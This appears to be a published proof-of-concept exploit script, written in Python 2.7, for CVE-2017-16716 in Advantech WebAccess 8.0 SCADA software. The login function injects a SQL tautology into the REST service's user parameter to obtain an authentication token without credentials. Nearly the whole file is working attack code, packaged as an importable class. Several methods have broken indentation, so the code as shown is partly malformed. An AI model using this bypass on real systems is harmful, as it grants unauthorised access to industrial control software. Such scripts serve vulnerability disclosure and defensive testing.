#!/usr/bin/python2.7
 
# Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability
# Date: 01-13-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe
# Version: Advantech WebAccess 8.0-2015.08.16
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-16716
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/
 
# Notes:
#
# There are two service interfaces:
# 1) SOAP
# 2) REST
#
# This PoC targets REST
#
# The web services did not work out of the box, and a new website/app was created in IIS for testing.
# This issue was potentially due to the fact that testing was completed against a trial version.
# PoC may need slight tweaks depending on configuration of the web service.
#
# Original vulnerability was reported for more recent software version.
#
# This WebAccessAuthBypass class can be imported :-) 
 
import sys, requests
from xml.etree import ElementTree
 
class WebAccessAuthBypass:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port
        self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port)
         
    def convert_entities(self, s):
    return s.replace('>', '>').replace('<', '<') # convert html entities in response, for parsing
 
    def get_project_list(self):
    print 'Getting list of projects...'
    res = requests.get(self.base_url)
    projects = list()
    if res.status_code != 200:
        print 'Bad HTTP response...'
    else:
        if 'PROJECT' not in res.text:
        print 'No projects listed by service.'
        else:
        s = self.convert_entities(res.text)
        xml = ElementTree.fromstring(s)
        for project_list in xml:
            for project in project_list:
            name = project.get('NAME')
            if name is not None:
                projects.append(name)
    if len(projects) > 0:
        print 'Found the following projects: ' + str(projects)
        return projects
    else:
        return None
 
    # returns a token
    def login(self, project):
    # SQL Injection into the user parameter
    url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x
    res = requests.get(url)
    token = None
    if res.status_code != 200:
        print 'Bad HTTP response...'
    else:
        if 'OK TOKEN' not in res.text:
        print 'No token returned by service.'
        else:
        s = self.convert_entities(res.text)
        xml = ElementTree.fromstring(s)
        if len(xml) > 0:
            token = xml[0].get('TOKEN')
    return token
 
    # token returned can be used for more transactions
    def get_token(self):
        project_list = self.get_project_list()
        project = project_list[0] # might as well pick the first project
        token = self.login(project_list[0])
        return token
 
if __name__ == "__main__":
    ip = 'targetip'
    port = 'port#'
    bypass = WebAccessAuthBypass(ip, port)
    token = bypass.get_token()
 
    if token is not None:
    print 'Successfully got an authentication token: ' + token
    else:
    print 'Unsuccessful.'